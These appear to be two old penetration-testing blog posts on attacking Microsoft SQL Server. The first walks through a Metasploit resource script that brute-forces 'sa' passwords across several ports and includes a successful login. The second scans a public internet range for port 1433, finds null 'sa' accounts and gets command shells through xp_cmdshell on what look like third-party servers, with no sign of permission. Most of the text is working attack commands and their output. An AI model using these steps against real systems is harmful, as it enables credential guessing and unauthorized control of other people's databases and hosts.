MSSQL Brute forcing with Resource Scripts

Problem:
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?

*MSF Pro/Express handle this for you using the database.

Possible Solution:

Use a resource script to populate the values for us.

This will work but we have to get the data in there.

1. Set up the database for metasploit

2. Get a list of servers

OSQL -L

Servers: 
    SEVERNAME1\SQL2000
    SEVERNAME2\SQL2005

OSQL will give you a list of hostnames, we need to turn these hostnames into IP addresses/ranges for mssql_ping.

You can use post/windows/recon/resolve_hostname to a list of hostnames and turn these into IP addresses.


msf  post(resolve_hostname) > run

[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed


with a list of IP addresses...do mssql_ping


msf  auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+]    InstanceName    = MSSQLSERVER
[+]    IsClustered     = No
[+]    tcp             = 1433
[+]    np              = \\servername1\pipe\sql\query
[+]    Version         = 8.00.194
[+]    ServerName      = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+]    InstanceName    = INSTANCE1
[+]    IsClustered     = Yes
[+]    tcp             = 2261
[+]    np              = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+]    Version         = 10.50.1600.1
[+]    ServerName      = SEVERNAME2


Now we can pull tcp ports out using the db query use the resource script to set the RHOST and RPORT for you per entry. weeeeeee

the query:

begin
framework.db.services.each do |service|
if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address, 'port' => service.port}
end
end

We can use that query to populate stuff on the fly for us.

example:


[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'

RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed


code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb

lots of other resource scripts are in the scripts/resources directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource


UPDATE 4 Jan 2013:
merged into metasploit trunk
https://github.com/rapid7/metasploit-framework/pull/1234

old school 0wning MSSQL --fun from the field

rule #1 dont expose your database to the world

rule #2 dont have a null sa account, especially if you are violating rule #1...

let's see...

use unicornscan to search for open TCP port 1433

cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p

Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108

run those hosts that respond through the msf auxillary module mssql_ping to see if we can get any version information. I'll omit the ones that didnt respond.


cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 4419

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

Now, lets run them thru mssql_login to look for any that have null sa accounts.

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 4749

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a null SA account.

msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed

then lets use sqlcmd to see if we can get a command shell on the box. sqlcmd uses the xp_cmdshell to execute commands.

cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuratio de IP do Windows


Adaptador Ethernet Conexto local:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador Ethernet Conexto de rede sem fio:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador PPP POP:
Sufixo DNS especsfico de conexto. :
Endereo IP . . . . . . . . . . . . : A.B.X.28
Mascara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padro. . . . . . . . . . . : A.B.X.28

OR

cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configurato de IP do Windows


Adaptador Ethernet Local:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.5
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . :

Adaptador Ethernet remoto:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.6
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . : 192.168.2.1

TFTP was available on both boxes for some some old school YR 2000 tftp upload your tools fun.

Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions

sqlcmd.c: http://excluded.wgv.at/codedstuff.php

metasploit (like you need the link): http://framework.metasploit.com/

-CG